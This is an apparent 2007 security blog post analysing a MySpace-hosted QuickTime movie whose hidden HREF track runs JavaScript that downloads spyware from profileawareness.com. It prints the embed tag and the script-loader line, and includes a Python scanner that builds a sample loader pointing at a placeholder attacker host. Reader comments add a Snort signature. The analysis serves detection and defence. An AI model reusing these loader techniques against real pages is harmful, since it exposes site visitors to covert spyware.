Didier Stevens

Monday 12 March 2007

P0wned by a QT movie

Filed under: Malware — Didier Stevens @ 10:14

Here’s an interesting infection vector, used by a new malware: it’s a QuickTime movie!

McAfee VirusScan detects the malware as JS/SpaceTalk Trojan. The description for this malware is empty, so your guess about the characteristics of this malware is as good as mine.

Interested in the details? Read on!

This Myspace page (of a French rock band) has an embedded QuickTime movie. Here’s the EMBED HTML tag in the source (I changed the formatting to make it more readable):

  <embed
    enableJavascript="false"
    allowScriptAccess="never"
    allownetworking="internal"
    src=http://profileawareness.com/tys4.mov
    hidden=true />

The EMBED tag instructs your browser to play a movie when it renders the HTML page. But in this case the movie is hidden (attribute hidden is true), so no player is displayed: the visitor sees nothing while the QuickTime plugin downloads tys4.mov from the profileawareness.com server and plays it.

This tys4.mov QuickTime movie is sneaky: it contains JavaScript code to download and execute another JavaScript program. QuickTime has a feature that allows you to embed URLs or JavaScript in a movie; Apple calls this feature HREF tracks. From the Apple site:

An HREF track is a special type of text track that adds interactivity to a QuickTime movie. HREF tracks contain URLs that can specify movies that replace the current movie, load another frame, or that load QuickTime Player. They can also specify JavaScript functions or Web pages that load a specific browser frame or window.

An HREF track is not meant to be displayed; it simply contains link information. The URLs in an HREF track can be interactive or automatic. An interactive URL loads when you click anywhere in the movie’s display area. An automatic URL loads as a movie is playing at the exact frame specified by a text descriptor timestamp in the HREF track. With automatic URLs, you can create a narrated tour of a website, use web pages as slides in a presentation, activate a JavaScript command, or do anything else that requires loading movies or web pages in a predetermined sequence.

The syntax of an HREF track is simple. Here’s an example that automatically loads the page http://www.google.com one minute into the movie (the A prefix makes the link automatic, and T<frame> names the browser frame it loads in):

  [00:01:00.00]
  A<http://www.google.com> T<frame>

Let’s take a look inside the tys4.mov QuickTime movie. First we use the strings command to dump all printable strings contained in this QuickTime file.

  strings tys4.mov

Here is what we see at the end of the dump:

[screenshot: qt_strings.PNG, end of the strings output]

Do you recognize the syntax at the end? A<javascript> T<>
It is an automatic link (the A prefix) with a javascript: URL and an empty target. Since there is no timestamp, the link fires as soon as the movie starts playing, and the browser runs the JavaScript in the context of the page that embeds the movie.
The script itself is simple: it creates a script element and adds it to the HTML page, which makes the browser download and execute a second script from the profileawareness server:

<script src='http://profileawareness.com/logs4/sqltrack.js'/>

It’s this script that is detected by McAfee (at the moment of writing, McAfee was the only antivirus on VirusTotal to detect this script).

The QuickTime file format is a binary, hierarchical stream of atoms: each atom starts with a 32-bit big-endian size and a four-character type, and container atoms such as moov and trak hold further atoms.
Qtatomizer is a tool to display this hierarchy of atoms.

[screenshot: qt_qtatomizer.PNG, atom hierarchy of tys4.mov]
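The atom structure and the HREF link syntax described above can be checked without QuickTime installed. The following Python script is an added example, not code from the original post and not Qtatomizer: it walks the atom tree (handling the 64-bit and run-to-end-of-container size encodings the format allows), then extracts HREF-style links the way the strings dump did, but structured: file offset, enclosing atom, automatic or interactive, URL scheme and target frame. The sample movie it analyzes is constructed inside the script (a skeleton atom tree plus an mdat holding two link samples); the host attacker.invalid and the exact JavaScript are placeholders and not the contents of tys4.mov.

```python
import re
import struct

# Atoms whose payload is a sequence of child atoms (QuickTime File Format spec).
CONTAINER_ATOMS = {b"moov", b"trak", b"mdia", b"minf", b"stbl", b"edts",
                   b"udta", b"dinf", b"tref", b"clip", b"matt"}

# HREF-track link syntax from the post: A<url> fires automatically at the
# sample's time, <url> alone needs a click, optional T<target> names a frame.
# Only URL-looking payloads match, so random binary data yields no hits.
HREF_RE = re.compile(
    rb"(A?)<((?i:javascript|https?|ftp|rtsp|file):[^<>]*)>(?:[ \t]*T<([^<>]*)>)?"
)


def parse_atoms(data, start=0, end=None, depth=0):
    """Flat, in-order list of (depth, type, offset, size) for the atoms in
    data[start:end], descending into container atoms.

    An atom header is a 32-bit big-endian size (covering the header) plus a
    4-byte type. Size 1 means a 64-bit size follows the type; size 0 means the
    atom runs to the end of its container. An atom overrunning its container
    is an error; trailing bytes shorter than a header are ignored.
    """
    end = len(data) if end is None else end
    atoms, pos = [], start
    while pos + 8 <= end:
        size, kind = struct.unpack(">I4s", data[pos:pos + 8])
        header = 8
        if size == 1:
            if pos + 16 > end:
                raise ValueError(f"truncated 64-bit header at offset {pos}")
            size = struct.unpack(">Q", data[pos + 8:pos + 16])[0]
            header = 16
        elif size == 0:
            size = end - pos
        if size < header or pos + size > end:
            raise ValueError(f"atom {kind!r} at offset {pos}: bad size {size}")
        atoms.append((depth, kind, pos, size))
        if kind in CONTAINER_ATOMS:
            atoms.extend(parse_atoms(data, pos + header, pos + size, depth + 1))
        pos += size
    return atoms


def enclosing_atom(atoms, offset):
    """Type (as str) of the deepest atom whose byte range contains offset."""
    best = None
    for depth, kind, pos, size in atoms:
        if pos <= offset < pos + size and (best is None or depth > best[0]):
            best = (depth, kind)
    return best[1].decode("latin-1") if best else None


def find_href_links(data, atoms):
    """What the strings dump showed, but structured: every HREF-style link with
    its offset, enclosing atom, automatic flag, URL scheme and target frame."""
    links = []
    for m in HREF_RE.finditer(data):
        url = m.group(2).decode("latin-1")
        target = m.group(3)
        links.append({
            "offset": m.start(),
            "atom": enclosing_atom(atoms, m.start()),
            "automatic": m.group(1) == b"A",
            "scheme": url.split(":", 1)[0].lower(),
            "url": url,
            "target": None if target is None else target.decode("latin-1"),
        })
    return links


def scan_movie(data):
    """Atom tree plus links; flags a movie that runs JavaScript as it plays."""
    atoms = parse_atoms(data)
    links = find_href_links(data, atoms)
    auto_js = any(l["automatic"] and l["scheme"] == "javascript" for l in links)
    return {"atoms": atoms, "links": links, "runs_script_on_play": auto_js}


def build_sample_mov():
    """Constructed test movie, not the real tys4.mov: a skeleton atom tree and
    an mdat with two 16-bit length-prefixed HREF text samples. attacker.invalid
    and the script body are placeholders mimicking the loader described in the
    post (append a script element to the page); the stts/stsz tables are omitted."""
    def atom(kind, payload=b""):
        return struct.pack(">I4s", 8 + len(payload), kind) + payload

    def text_sample(text):
        return struct.pack(">H", len(text)) + text

    js = (b"javascript:var s=document.createElement('script');"
          b"s.src='http://attacker.invalid/x.js';document.body.appendChild(s)")
    samples = text_sample(b"A<" + js + b"> T<>")
    samples += text_sample(b"[00:01:00.00]\nA<http://www.google.com> T<frame>")
    hdlr = atom(b"hdlr", b"\x00" * 4 + b"mhlr" + b"text" + b"\x00" * 12)
    trak = atom(b"trak", atom(b"tkhd", b"\x00" * 84) + atom(b"mdia", hdlr))
    moov = atom(b"moov", atom(b"mvhd", b"\x00" * 100) + trak)
    return atom(b"ftyp", b"qt  \x00\x00\x00\x00qt  ") + moov + atom(b"mdat", samples)
```

To run it against a real file, call scan_movie(open(path, "rb").read()). A link whose scheme is javascript and whose automatic flag is set is exactly the downloader pattern described in this post; an automatic http link is how HREF tracks are used legitimately (slide shows, narrated tours), so the scheme, not the mere presence of a link, is the signal to act on.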

In malware terminology the QuickTime movie is a Downloader: it carries no payload of its own and only fetches the real one. At the time of writing, no AV program detected it.

The downloaded script is just Spyware: it collects data about the Myspace user viewing the page and uploads it to the profileawareness server.

[screenshot: qt_script.PNG, the downloaded sqltrack.js]

To summarize the actions:
• You visit a website
• It plays a hidden QuickTime movie
• The QuickTime movie automatically downloads a JavaScript program
• The JavaScript program is executed

29 Comments »

  1. *shakes a fist at QuickTime trying to do too much*

    Nice analysis, Didier! I always like reading your posts like this, as they are easy to follow and give a really good example/tutorial for those of us who’ve not done something like this before.

    Comment by LonerVamp — Monday 12 March 2007 @ 13:40

  2. Wow, good job! I never suspected that Quicktime movies could be used as an attack vector. Oh my, think about how effective this could be if the sites peddling free pr0n samples would start using this technique.

    Btw, I’m pretty sure the technical term here should be “Pwnt” or “Pwned”. This is the first time I saw someone spell it “P0wned”. ;)

    Comment by Luke — Monday 12 March 2007 @ 14:07

  3. Thanks.

    About P0wned: I was inspired by Harlan’s post “P0wned by certs” (http://windowsir.blogspot.com/2007/01/p0wned-by-certs.html)

    Comment by Didier Stevens — Monday 12 March 2007 @ 14:15

  4. [...] you know that you can embed JS scripts in Apple Quicktime movies? (the feature is called “HREF tracks”) An HREF track is a special type of text track [...]

    Pingback by QuickTime movies as malware infection vector at Security Samizdat — Monday 12 March 2007 @ 15:11

  5. nice analysis, QuickTime has a few other issues similar to this one. You can read about them here:

    http://www.gnucitizen.org/blog/backdooring-quicktime-movies/

    http://www.gnucitizen.org/blog/backdooring-mp3-files/

    Comment by pdp — Monday 12 March 2007 @ 17:36

  6. [...] Here’s a link to the blog entry: http://didierstevens.wordpress.com/2007/03/12/p0wned-by-a-qt-movie/ [...]

    Pingback by average admins » Blog Archive » P0wned by a QT movie — Monday 12 March 2007 @ 21:07

  7. This exploit vector should have been taken care of with the Quicktime 7.1.5 update (dating March 6th).

    http://developer.apple.com/documentation/QuickTime/Conceptual/QTScripting_JavaScript/bQTScripting_JavaScri_Document/chapter_1000_section_4.html

    As your article was published March 12th I’m surprised that you did not include any information about this update.

    Regards,
    Joachim

    Comment by Joachim Buechse — Friday 16 March 2007 @ 11:30

  8. Thanks Didier, good info.

    Symantec now sees the Javascript sqltrack.js as Infostealer.

    Steve

    Comment by Steve — Friday 16 March 2007 @ 11:48

  9. Anyone think of a little ‘poison the well’ approach with the javascript? IE, sending a bunch of crap to fill their tracking server… I know I’ve thought of it.

    Comment by bongo mcginty — Friday 16 March 2007 @ 13:02

  10. Hello,

    Does anyone know if this vulnerability was patched with the update that Apple released last week? Specifically, I’m thinking of:

    CVE-ID: CVE-2006-4965, CVE-2007-0059

    Available for: Mac OS X v10.3.9 and later, Windows Vista/XP/2000

    Impact: Viewing a maliciously-crafted QuickTime movie file or QTL file may lead to arbitrary JavaScript code execution in context of the local domain

    Description: A cross-zone scripting issue exists in QuickTime’s browser plugin. By enticing a user to open a malicious QuickTime movie file or QTL file, an attacker can trigger the issue, which may lead to arbitrary JavaScript code execution in context of the local domain. This issue has been described on the Month of Apple Bugs web site (MOAB-03-01-2007). This update addresses the issue by performing additional validation of QuickTime movie files and QTL files.

    http://docs.info.apple.com/article.html?artnum=305149

    Comment by Dan Goodin — Friday 16 March 2007 @ 14:03

  11. This is the same old problem as ‘doze media player has been suffering from for years: they call them ‘url flips’. See, e.g.

    http://marc.theaimsgroup.com/?l=bugtraq&m=101447771102582&w=2

    http://archives.neohapsis.com/archives/ntbugtraq/2002-q3/0112.html

    for a couple of malicious uses.

    Comment by DaveK — Friday 16 March 2007 @ 16:39

  12. [...] detailed analysis of this interesting infection vector can be viewed at Didier Stevens’s blog. A silver lining in the whole murky episode is that McAfee customers are proactively protected from [...]

    Pingback by Computer Security Research - McAfee Avert Labs Blog — Friday 16 March 2007 @ 17:24

  13. Apple fixed a similar issue in 7.1.5. Check http://docs.info.apple.com/article.html?artnum=305149
    and search for scripting.

    Are you using 7.1.5? If so, did you actually see any script execution, or are you just going by the McAfee alert?

    Comment by Anonymous — Saturday 17 March 2007 @ 4:31

  14. Could a JavaScript run an executable through the Apple QuickTime flaw? Just asking because I have been infected by malware and I think this could be the technique. And a little example if this can be done. Thank you in advance.

    Comment by priv8 — Saturday 17 March 2007 @ 12:43

  15. MySpace has a QuickTime exploit

    As already discovered almost a week ago, there is an exploit on MySpace in .mov films (e.g. when visiting the band Mamasaid..); when these are opened, a script is executed in the background.
    “The script determines the Myspace username of the …

    Trackback by grafikworkX - the design factory — Sunday 18 March 2007 @ 5:29

  16. [...] that acts as the spyware, according to the researcher, Didier Stevens, who documents his findings here. http://www.theregister.com/2007/03/16/myspace_quicktime_exploit/ [...]

    Pingback by DP's Security Bits : MySpace-hosted malware exploits QuickTime flaw — Sunday 18 March 2007 @ 8:30

  17. @Joachim

    > As your article was published March 12th I’m surprised that you did not include any information about this update.

    The explanation is very simple: I discovered this and wrote the article before Apple published a fix, and I was not aware that Apple had released a fix for this when I published the article. I don’t use QT, it’s not installed on my systems.

    Comment by Didier Stevens — Sunday 18 March 2007 @ 13:42

  18. @priv8

    Yes, the JavaScript could exploit a browser vulnerability to execute an executable in the user’s security context.

    Comment by Didier Stevens — Sunday 18 March 2007 @ 13:51

  19. Can you go into more detail on the last comment? What type of browser vulnerability would need to exist to execute an executable from Javascript?

    Comment by Anonymous — Sunday 18 March 2007 @ 17:11

  20. [...] version (7.1.5) without support for JavaScript. This happened about a week before I posted “P0wned by a QT movie”. I had analyzed the infection and written (but not published) my post before Apple published the [...]

    Pingback by Update: P0wned by a QT movie « Didier Stevens — Sunday 18 March 2007 @ 19:14

  21. @Anonymous

    ADODB.Stream for example, http://www.f-secure.com/v-descs/adodb_stream.shtml

    Comment by Didier Stevens — Monday 19 March 2007 @ 11:36

  22. [...] detailed analysis of this interesting infection vector can be viewed at Didier Stevens’s blog. A silver lining in the whole murky episode is that McAfee customers are proactively protected from [...]

    Pingback by Chris Mosby at myITforum.com : McAfee Avert Labs Blog - MySpace Woes: Trojan Targets French Rock Band Fans - Friday March 16, 2007 — Monday 19 March 2007 @ 16:14

  23. Posted a Snort sig to BleedingThreats.net.

    alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE CURRENT EVENTS SpaceTalk-QT-js"; flow:to_server,established; uricontent:"/logs4/sqltrack.js"; nocase; classtype:trojan-activity; reference:url,didierstevens.wordpress.com/2007/03/12/p0wned-by-a-qt-movie/; sid:2003507; rev:1;)

    Comment by Russ McRee — Monday 19 March 2007 @ 17:57

  24. [...] to execute scriptable content in the context of the current website. Didier Stevens has a nice write up of the particular exploit.  Though it appears patched with the latest version of Quicktime it [...]

    Pingback by :: Binary Paradox :: » Blog Archive » A Eulogy for Flatfiles — Monday 19 March 2007 @ 18:02

  25. I am protected by McAfee… but I suspect I have this trojan… is it possible that somehow this malware or whatever can disable my virus protection? There have been a few occasions when I have found my protection disabled, yet I hadn’t disabled it.

    Elizabeth

    Comment by Elizabeth m Maloney — Wednesday 28 March 2007 @ 1:57

  26. Yes, a lot of malware programs can disable security software, like AV. However, most of them can only do this when you run as local admin.

    Comment by Didier Stevens — Sunday 1 April 2007 @ 18:49

  27. their own personal space at last

    Yeah!. Congratulations for the blog
    Your post is very interesting .In your blog are a lot of good post..
    I’ll bookmark you.
    A462fc6cb9bbeb

    Trackback by me 4you — Wednesday 25 April 2007 @ 21:23

  28. Peace people

    We love you

    Comment by HelloWorld — Saturday 28 April 2007 @ 11:48

  29. I think I’ve read something similar a few days ago. I don’t remember where, might have been on digg.com or slashdot.

    Comment by kevstelo — Monday 11 June 2007 @ 7:30

